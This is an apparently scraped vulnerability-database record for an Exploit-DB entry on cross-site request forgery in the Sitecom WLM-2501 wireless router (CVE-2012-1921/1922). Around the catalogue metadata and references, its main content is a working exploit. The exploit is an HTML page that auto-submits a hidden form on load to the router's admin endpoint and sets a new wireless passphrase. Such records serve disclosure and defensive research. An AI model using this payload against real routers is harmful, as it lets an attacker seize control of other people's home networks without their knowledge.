ID

VAR-E-201203-0134


CVE

cve_id:CVE-2012-1921

Trust: 1.6

cve_id:CVE-2012-1922

Trust: 1.0

sources: EXPLOIT-DB: 18597 // EDBNET: 40941

EDB ID

18597


TITLE

Sitecom WLM-2501 - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18597

DESCRIPTION

Sitecom WLM-2501 - Cross-Site Request Forgery. CVE-2012-1922CVE-2012-1921CVE-80538 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 18597

AFFECTED PRODUCTS

vendor:sitecommodel:wlm-2501scope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 18597 // EDBNET: 40941

EXPLOIT

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Sitecom WLM-2501 Change Wireless Passphrase
# Date : 13-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Vendor site : http://www.sitecom.com/wireless-modem-router-300n/p/859
# Version : WLM-2501
# Tested on : WLM-2501 (All Sitecom WL series might be is affected by these vulnerabilities)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
2)Vulnerability Description
3)Exploit

+--------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
Sitecom WLM-2501 is a Wireless Modem Router 300N which uses a web management interface - listening to default on tcp/ip port 80
- and "admin" as default administrator. His default ip address is 192.168.0.1.

2)Vulnerability Description
The web interface of this router is affected by muktiple CSRF vulnerabilities which allows to change router parameters and
- among other things - to change Wireless Passphrase.

3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlEncrypt">
<input type="hidden" name="wlanDisabled" value="OFF"/>
<input type="hidden" name="method" value="6"/>
<input type="hidden" name="wpaAuth" value="psk"/>
<input type="hidden" name="pskFormat" value="0"/>
<input type="hidden" name="pskValue" value="newpassword"/>
<input type="hidden" name="submit-url" value="%2Fwlwpa.asp"/>
<input type="hidden" name="save" value="Apply"/>
</form>
</body>
</html>

+--------------------------------------------------------------------------------------------------------------------------------+

Trust: 1.0

sources: EXPLOIT-DB: 18597

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 18597

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18597

TYPE

Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 18597

CREDITS

Ivano Binetti

Trust: 0.6

sources: EXPLOIT-DB: 18597

EXTERNAL IDS

db:NVDid:CVE-2012-1921

Trust: 1.6

db:EXPLOIT-DBid:18597

Trust: 1.6

db:NVDid:CVE-2012-1922

Trust: 1.0

db:EDBNETid:40941

Trust: 0.6

sources: EXPLOIT-DB: 18597 // EDBNET: 40941

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-1921

Trust: 1.6

url:http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2012-1922

Trust: 1.0

url:https://www.exploit-db.com/exploits/18597/

Trust: 0.6

sources: EXPLOIT-DB: 18597 // EDBNET: 40941

SOURCES

db:EXPLOIT-DBid:18597
db:EDBNETid:40941

LAST UPDATE DATE

2022-07-27T09:35:43.404000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:18597date:2012-03-14T00:00:00
db:EDBNETid:40941date:2012-03-14T00:00:00